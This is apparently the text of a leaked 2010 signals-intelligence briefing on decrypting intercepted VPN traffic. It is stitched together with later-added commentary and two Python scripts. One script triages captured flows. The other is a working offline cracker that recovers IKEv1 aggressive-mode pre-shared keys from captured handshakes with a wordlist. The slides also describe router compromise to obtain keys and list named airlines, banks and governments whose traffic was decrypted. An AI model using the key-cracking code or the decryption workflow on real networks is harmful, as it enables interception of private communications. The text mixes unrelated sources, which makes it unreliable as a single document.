
TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 



Intro to the VPN Exploitation Process



OTP VPN Exploitation Team 

S31176 




September 13, 2010 













Overview 




- S31176 and the OTP VPN Exploitation Team
- How can we help you?
- VPN and Network Encryption Types
- Birth of the VPN Adventure
- Sustained Exploitation
- Exploitation Successes
- Conclusions
S31176

Branch Name:
Custom Thread Development for Network Encryption

Team Name:
OTP VPN Exploitation Team
Mission Statement




S31176 provides cryptanalytic support services for many 
network encryption protocols, including, but not limited to: 
IPSec, SSL, PPTP, SSH and proprietary protocols. We are 
the front-door of CES for targeted vulnerability assessment 
and custom interim end-to-end exploitation flows for these 
protocols. In conjunction with various agency SIGDEV 
counterparts and target organizations, we engage in 
discovery to find TOPI targets of interest. By maintaining 
contact with field sites, TAO, and NCSC, we endeavor to 
guide and direct development and access through both 
active and passive means in order to make exploitation 
possible and enable full prosecution of the target... 
Purpose in a Nutshell

- Act as your one stop shop for all VPN and network encryption exploitation related issues!
- Act as a liaison for SIGDEVers and TOPIs to other areas of the VPN community
- Perform some SIGDEV and target discovery
Where are we positioned?

SID, S
  Data Acquisition, S3
    Cryptanalytic Exploitation Services, S31
      Office of Target Pursuit, S311
        Cryptanalytic Exploitation Discovery, S3117
          Custom Thread Development for Network Encryption, S31176
S31176 Branch Members

- Collection
- CMP Intern
- Team Lead, IPSec, SSH
- IPSec
- Branch Chief
- Diversity Tour
- CADP Intern
- PPTP
- BLEAKINQUIRY, SSL

How to Contact us (May be changing soon): 
Branches within OTP

S31171 - PRC, N Korea, SE Asia, Japan
S31172 - Iran, Hamas, Iraq, Saudi Arabia
S31173 - Africa, Levant, Latin America, India, Pakistan, Afghanistan
S31174 - Russia, Counter-Intel, Europe, FTM
S31175 - Cross-Target Support Branch
S31176 - Custom Thread Development
Exploitation in the OTP Branches



Each branch has a VPN representative 

We inform them about attacks, they inform us about targets 
If you have a target-specific inquiry, they may be able to help 



S31171 (Eastern and Southeast Asia) 



S31172 (Iran, Iraq, Arabian Peninsula) 



S31173 (Levant, Central Asia, Africa, Latin America) 



S31174 (Russia, Europe, International Targets) 
How can we help you?




Provide Exploitation Support 

Provide VPN vulnerability analysis 

Engage Network Security Products, TAO, ESO, etc 

Convey meaningful feedback to customer 

Develop sustained exploitation threads when 
possible 

Suggest alternative approaches if passive 
exploitation is unrealistic 

DECRYPTS, DECRYPTS, DECRYPTS!!!!!! 
Additional Services

We can assist with the following:

Collection problems
Tasking
Data flow
Plaintext analysis
Metadata interpretation
Tip-off vulnerable VPN links
VPN SIGDEV
Target Discovery and Development
Glad you asked!

Familiarize yourself with appropriate search criteria 



Get a BLEAKINQUIRY account 



If you find VPN-related data, let us know. 

The existence of a VPN on a network of interest 
Configuration/setup information about the VPN 
BLEAKINQUIRY




Metadata database of potentially exploitable VPNs 



Data Sources 

TOYGRIPPE metadata testing 
XKEYSCORE fingerprints 
Daily VPN exploitation 

Let us stress... "P-O-T-E-N-T-I-A-L"




Want an account? 

E-mail or 
[Screenshot: BLEAKINQUIRY web interface in a browser, with Simple Search, Advanced Search and Batch Search tabs]
Local IPSec Processing
Type 1: IPSec

IPSec: IP Security
Complete paired IKE

Common UDP ports: 500 (IKE) and 4500 (IKE/ESP with NAT traversal)

Pre-Shared Key (PSK)

Router configuration (good source for PSKs)

Encrypted Payload (ESP or AH)

IP protocol number 50 (ESP) or 51 (AH)

XKEYSCORE Queries

Full log DNI search

AppID/Fingerprints: “vpn/*”, “vpn/esp”, “vpn/isakmp”, “vpn/ikev2”, “vpn/ikev2_content”
Type 2: PPTP

PPTP: Point-to-Point Tunneling Protocol

Paired collect

GRE (IP protocol number 47) = PPTP payload

TCP port 1723 = PPTP tunnel setup, no payload

One-sided collect, client side

XKEYSCORE Queries

Full log DNI search

Enter your IPs/casn/etc of interest

AppID/Fingerprint: “vpn/pptp_encr*”

Share your results with
Type 3: SSL

SSL - Secure Sockets Layer

Renamed TLS (Transport Layer Security) but still often referred to as SSL

Paired collect - Compare IPs and Ports
Server Certificates

Port Numbers: 443, 465, 989, 990, 992, 993, and 995

XKEYSCORE Queries

Full log DNI search or use SSL plugin

AppID/Fingerprints: “encryption/ssl/*” or “network_encryption/ssl/*”
Type 4: SSH

Industry-standard networking protocol for securely logging into other machines via a network.

Complete paired traffic
Port number 22

Potentially recover user names and passwords

Useful to TAO to access boxes and gather cryptographic information

XKEYSCORE Queries

Full log DNI search
AppID/Fingerprints: “terminal/ssh/*”
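The four traffic types above are told apart by a handful of IP protocol numbers and ports, and the later slides on data flow integrity and collection sites reduce to two questions per endpoint pair: was traffic captured in both directions (paired collect), and, for IPSec, were both the IKE exchange and the ESP/AH payload captured. The Python below is an added example of that triage over flow records; it is not from the briefing or from any tool the briefing names. The `Flow` record, the `PairReport` fields and the sample flows are constructed for illustration, and the labels only echo the AppID naming style quoted on the slides.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set, Tuple

# IANA protocol numbers and ports named on the slides
PROTO_TCP, PROTO_UDP, PROTO_GRE, PROTO_ESP, PROTO_AH = 6, 17, 47, 50, 51
IKE_PORT, NATT_PORT, PPTP_PORT, SSH_PORT = 500, 4500, 1723, 22
SSL_PORTS = frozenset({443, 465, 989, 990, 992, 993, 995})
IKE_LABELS = {"vpn/isakmp", "vpn/nat-t"}
PAYLOAD_LABELS = {"vpn/esp", "vpn/ah", "vpn/nat-t"}


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record; ports are 0 for GRE, ESP and AH."""
    src: str
    dst: str
    proto: int
    sport: int = 0
    dport: int = 0


def classify(f: Flow) -> str:
    """Label a flow; names echo the AppID/fingerprint style quoted on the slides."""
    ports = {f.sport, f.dport}
    if f.proto == PROTO_ESP:
        return "vpn/esp"
    if f.proto == PROTO_AH:
        return "vpn/ah"
    if f.proto == PROTO_GRE:
        return "vpn/pptp_payload"        # PPTP carries PPP frames inside GRE
    if f.proto == PROTO_UDP and IKE_PORT in ports:
        return "vpn/isakmp"
    if f.proto == PROTO_UDP and NATT_PORT in ports:
        # UDP/4500 carries IKE and UDP-encapsulated ESP alike; separating them
        # needs the 4-byte non-ESP marker in the payload, which a flow record
        # lacks, so this label counts on both sides of the completeness check.
        return "vpn/nat-t"
    if f.proto == PROTO_TCP and PPTP_PORT in ports:
        return "vpn/pptp_control"        # tunnel setup only, no payload
    if f.proto == PROTO_TCP and SSH_PORT in ports:
        return "terminal/ssh"
    if f.proto == PROTO_TCP and ports & SSL_PORTS:
        return "encryption/ssl"
    return "other"


@dataclass
class PairReport:
    labels: Set[str] = field(default_factory=set)
    directions: Set[Tuple[str, str]] = field(default_factory=set)

    @property
    def paired(self) -> bool:
        """Traffic captured in both directions ("paired collect")."""
        return len(self.directions) == 2

    @property
    def ipsec_complete(self) -> bool:
        """Both the key exchange and the protected payload were captured."""
        return bool(self.labels & IKE_LABELS) and bool(self.labels & PAYLOAD_LABELS)

    def missing(self) -> List[str]:
        """What to ask the collection site for before attempting a decrypt."""
        gaps = ["single-sided collect"] if not self.paired else []
        if self.labels & (IKE_LABELS | PAYLOAD_LABELS):   # only meaningful for IPSec
            if not self.labels & IKE_LABELS:
                gaps.append("no IKE seen (cannot derive keys)")
            if not self.labels & PAYLOAD_LABELS:
                gaps.append("no ESP/AH seen (nothing to decrypt)")
        return gaps


def assess(flows: Iterable[Flow]) -> Dict[Tuple[str, str], PairReport]:
    """Group VPN-related flows by unordered endpoint pair and report gaps per pair."""
    reports: Dict[Tuple[str, str], PairReport] = defaultdict(PairReport)
    for f in flows:
        label = classify(f)
        if label != "other":
            key = (min(f.src, f.dst), max(f.src, f.dst))
            reports[key].labels.add(label)
            reports[key].directions.add((f.src, f.dst))
    return dict(reports)


# Constructed sample flow records, not real collection.
SAMPLE_FLOWS = [
    Flow("10.0.0.1", "198.51.100.7", PROTO_UDP, 500, 500),    # IPSec, IKE + ESP both ways
    Flow("198.51.100.7", "10.0.0.1", PROTO_UDP, 500, 500),
    Flow("10.0.0.1", "198.51.100.7", PROTO_ESP),
    Flow("198.51.100.7", "10.0.0.1", PROTO_ESP),
    Flow("10.0.0.2", "203.0.113.9", PROTO_ESP),               # ESP one way, no IKE: the "No" case
    Flow("10.0.0.3", "192.0.2.25", PROTO_TCP, 51000, 1723),   # PPTP control + GRE payload
    Flow("192.0.2.25", "10.0.0.3", PROTO_TCP, 1723, 51000),
    Flow("10.0.0.3", "192.0.2.25", PROTO_GRE),
    Flow("192.0.2.25", "10.0.0.3", PROTO_GRE),
    Flow("10.0.0.4", "192.0.2.80", PROTO_TCP, 40022, 22),     # SSH, client side only
    Flow("10.0.0.5", "192.0.2.81", PROTO_UDP, 53000, 53),     # DNS, ignored
]

if __name__ == "__main__":
    for pair, r in assess(SAMPLE_FLOWS).items():
        print(pair, sorted(r.labels), "paired" if r.paired else "single-sided", r.missing())
```

The `missing()` list is the point of the exercise: it is the same list of things the "From No to YES" and "Collection Sites" slides say to go back to the collection site for. Port-based labelling is only a first pass; the XKEYSCORE fingerprints quoted above work on payload, and UDP/4500 in particular cannot be resolved from a 5-tuple alone.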
Birth of the VPN Adventure

We receive VPN-related requests from across the Globe

TOPIs
SIGDEV Analysts
OTP Analysts
Cryptologic Centers
Field Sites
Second Parties
The Many Flavors of Requests

[Diagram: kinds of requests flowing into the VPN Exploitation Team]

- IP Links & Ranges
- SSH
- Fingerprints
- VPN Metadata
- Domain Names
- BLEAKINQUIRY
- Protocols
- Interesting Terms & Names
- Vulnerability Evaluations
1. Initial Steps



VPN Info Found/Question Arises 



Task Assigned to Team Analyst 






Gather Background Info About Request 
2. Consult Repositories




BLEAKINQUIRY - Metadata database of potentially exploitable VPNs 



TOYGRIPPE - VPN metadata repository 

PINWALE - Long-term repository for 
tasked SIGINT collect 

XKEYSCORE - Processes and databases DNI 
collect from various field sites 

Full-take feed (tasked and untasked) 

VULCANDEATHGRIP - Repository for 
tasked, full-take VPN collection 

FOURSCORE - PPTP repository 
3. Scripts: IPSec Focus




Format downloaded repository files 
Create intermediate processing files 
Check for potential vulnerabilities 
Search for PSKs in CORALREEF 
Run attacks to recover PSK 
Decrypt traffic 
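The slide does not say which attacks the "Run attacks to recover PSK" step uses. One standard offline attack that fits a purely passive setting is against IKEv1 aggressive mode with pre-shared-key authentication: the responder sends HASH_R unencrypted, and every other input to it (both nonces, both Diffie-Hellman public values, both cookies, the initiator's SA payload and the responder's ID) is also visible on the wire, so candidate keys from a wordlist or from a recovered router configuration can be tested without sending a single packet to the target. The Python below is an added illustration of that check and is not the team's script; it assumes IKEv1 aggressive mode with SHA-1 as the negotiated hash (RFC 2409 section 5.4), and the captured field values are constructed, with HASH_R computed from the known key so that the match can be demonstrated. Main mode sends HASH_R inside the encrypted fifth and sixth messages, so this check does not apply there, which is one reason the earlier slide points at router configurations as the good source of PSKs.

```python
import hmac
from dataclasses import dataclass, replace
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """What a passive observer sees in the first two IKEv1 aggressive-mode messages."""
    ni_b: bytes              # initiator nonce payload body
    nr_b: bytes              # responder nonce payload body
    gxi: bytes               # initiator Diffie-Hellman public value
    gxr: bytes               # responder Diffie-Hellman public value
    cky_i: bytes             # initiator cookie (8 bytes)
    cky_r: bytes             # responder cookie (8 bytes)
    sai_b: bytes             # initiator SA payload body
    idir_b: bytes            # responder identification payload body
    hash_r: bytes            # HASH_R as sent, unencrypted, by the responder
    hash_name: str = "sha1"  # negotiated hash; the IKEv1 prf is HMAC over it


def ikev1_skeyid_psk(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """RFC 2409 s.5.4 (pre-shared key auth): SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return hmac.new(psk, c.ni_b + c.nr_b, c.hash_name).digest()


def ikev1_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """RFC 2409 s.5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = ikev1_skeyid_psk(psk, c)
    msg = c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b
    return hmac.new(skeyid, msg, c.hash_name).digest()


def recover_psk(candidates: Iterable[bytes], c: AggressiveModeCapture) -> Optional[bytes]:
    """Return the first candidate whose HASH_R matches the captured one, else None.

    A miss means only that the key was not in the candidate list; the check itself
    costs two HMACs per candidate and never touches the target.
    """
    for psk in candidates:
        if hmac.compare_digest(ikev1_hash_r(psk, c), c.hash_r):
            return psk
    return None


def build_sample_capture(true_psk: bytes = b"cisco123") -> AggressiveModeCapture:
    """Constructed sample, not real traffic: field bytes are arbitrary and HASH_R is
    computed from true_psk exactly as a responder would compute it."""
    c = AggressiveModeCapture(
        ni_b=bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0"),
        nr_b=bytes.fromhex("f0e1d2c3b4a5968778695a4b3c2d1e0f"),
        gxi=bytes(range(0, 128)),                  # stand-in for a 1024-bit g^xi
        gxr=bytes(range(128, 256)),                # stand-in for a 1024-bit g^xr
        cky_i=bytes.fromhex("1122334455667788"),
        cky_r=bytes.fromhex("8877665544332211"),
        sai_b=bytes.fromhex("00000001000000010000002c01010001"),  # arbitrary SA body
        idir_b=bytes.fromhex("01110000c6336407"),  # ID_IPV4_ADDR, UDP, 198.51.100.7
        hash_r=b"",
    )
    return replace(c, hash_r=ikev1_hash_r(true_psk, c))


if __name__ == "__main__":
    capture = build_sample_capture()
    wordlist = [b"password", b"admin", b"cisco123", b"letmein"]
    print("recovered PSK:", recover_psk(wordlist, capture))
```

Recovering the PSK is only the first half of the "Run attacks to recover PSK / Decrypt traffic" steps: with the PSK and the same captured values, SKEYID_d and the ESP keys follow from the RFC 2409 derivation, which is what the "Complete paired IKE" requirement on the IPSec slide is about.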
4. Communicate Results




Can we decrypt the VPN traffic? 



If the answer is “No” then explain how to 
turn it into a “YES!” 



If the answer is “YES!” then... 

YES! We Have Decrypt! 




Notify customer of success 

Send decrypt through post-processing and 
deliver to TOPI 



Have TOPI determine the priority level of the 
resulting plain text 

Get IPs on sustained collect 



Set up and transition sustained decryption 
process to OTP VPN Branch Rep 
Turn that Frown Upside Down!
From “No” to “YES!” 




Depends on why we couldn’t decrypt it 

Find Pre-Shared Key 

Locate complete paired collect 

Locate both IKE and ESP traffic 

Have collection sites do surveys for the IP’s 

Find better quality collect with rich metadata 
Contact Our Friends for




Network Security Products 
Develop decryption algorithms 
Tailored Access Operations 
Computer Network Exploitation to create access points 



Collection Sites 

Perform surveys for the IPs of interest 
More Friends

NSA/CSS Commercial Solutions Center
Manage industrial relationships

SIGDEV
Develops tools and methods to help you find the traffic you desire

OTP VPN Representatives
Assist in locating traffic of interest

TOPI
Target knowledge
Sustained Exploitation




Develop sustained exploitation thread 
AFTER the TOPI confirms the decrypts are 
interesting 

TOPI must task IP in CADENCE 

Task Port and IP 

UTT does not have boolean logic 
Categories 

IPSec: 6640 (protocols) and 6648 (ports) 

PPTP: 6648 (ports) 

SSL: 6647 (ports) 

Get the crypt system title 

Work with the OTP VPN Regional Branch representative 
Establish the Data Flow

Establish the correct corporate data flow

CES data flow guru

Make sure the correct routing tags and categories 
are appended to the data 

Direct tasked traffic to correct data repository 

PINWALE 

VULCANDEATHGRIP - IPSec 
VULCANMINDMELD - SSL 
FOURSCORE - PPTP 

Try to avoid relying on XKS workflows due to legal and 
logistical issues 

XKEYSCORE - SSH using XKS workflows directed to 
a file directory 
Data Flow Integrity

Evaluate data integrity, quality, & quantity 



Different collectors produce different metadata 
formats 

Need rich metadata 




Need all the pieces (IKE and ESP for IPSec) 

Ensure that the data is not garbled and headers 
attached appropriately 

Check that the data volume is what is expected 
Collection Sites

Contact Collection Sites if there are data issues

Malformed headers
Missing metadata
Missing payload
Garbled data
Low volume
Single-sided traffic

Collection sites sometimes only collect one side of the VPN traffic
Need to collaborate with both sites
Decrypt Processing

Decrypt the VPN traffic
Create SRI files for decrypts

Send the decrypt and SRI files to TURTLEPOWER (IPSec, PPTP) or CAPRI OS (SSL, SSH) for post-processing
Decryption of payload
Decompression
Unrar files

Route to appropriate data repository according to the crypt system title and type of decrypt (text, voice, etc)
Decrypt Repositories




PINWALE 

Tasked IPSec, PPTP, and SSL 

Must be placed in the correct partition according to 
classification (REL FVEY, NOFORN, FISA) 



XKEYSCORE 

SSH - often have router configurations and user 
credentials which are easier to view in XKS than 
PINWALE 

Still developing the process 
TOPI Evaluation

Analyst locates the decrypts in PINWALE and/or XKEYSCORE

Viewing the decrypts
PINWALE
XKEYSCORE
AGILITY
DNI PRESENTER

Contact TURTLEPOWER or CAPRI OS if there are file rendering issues

Also try the Unidentified Protocols team in S31122 for help identifying unknown protocols
Thread Monitoring

Responsibility for monitoring these exploitation threads is transferred to the OTP VPN Regional Branch representative after the thread is established and stabilized

Troubleshoots decryption and collection issues

Set up a cron job to run the decryptor every day

Hopefully the TOPI continues to identify and report mission-critical intelligence from these decrypts
Success 1: IPSec




Follow-the-Money and TAO Targets 



TOPI (S2C22) has had a close 
relationship with TAO for quite some time 



FTM Target 1 

Not susceptible to any of NSP’s implants 

TAO got the configuration files which 
provided us the PSKs to enable passive 
exploitation 



Success 1: IPSec (continued)




FTM Target 2 

TAO got on the router through which banking 
traffic of interest flows 



NSP had an implant which allows passive 
exploitation with just ESP 

Successful exploitation for the past two 
years 
Success 2: PPTP

Airlines 

Iran Air, IRTAA 

Royal Jordanian Air, JOTAA 

Transaero Airlines, RUCAC 

Telecommunications 





Mir Telematiki (pending system title) 
Afghani Wimax (pending system title) 

Government 

Mexican Diplomatic, MXDBB 
Pakistani General Intelligence, PKRAQ 
Turkish Diplomatic, TUDAT 
Afghanistan Government, AFYAD 
Success 2: PPTP (continued)

Banking and Financial 



Zaad Financial 




Ewallet transactions of a principal financial node for 
Somali terrorist activity 

Follow-the-Money customer 

Kabul Bank 

BNI Banking, Indonesia 

Formed and owned by the Indonesian government 

Banking transactions over “Flexy,” Telkom 
Indonesia’s fixed wireless network 

Other 

IRGC cyber attacker 

Nigerian power company’s internal network 
Reminders




If it’s not exploitable now, that doesn’t mean it 
won’t be later 



We collaborate and communicate with our 
friends to produce decrypts 



Traffic must be both good quality and the 
correct type 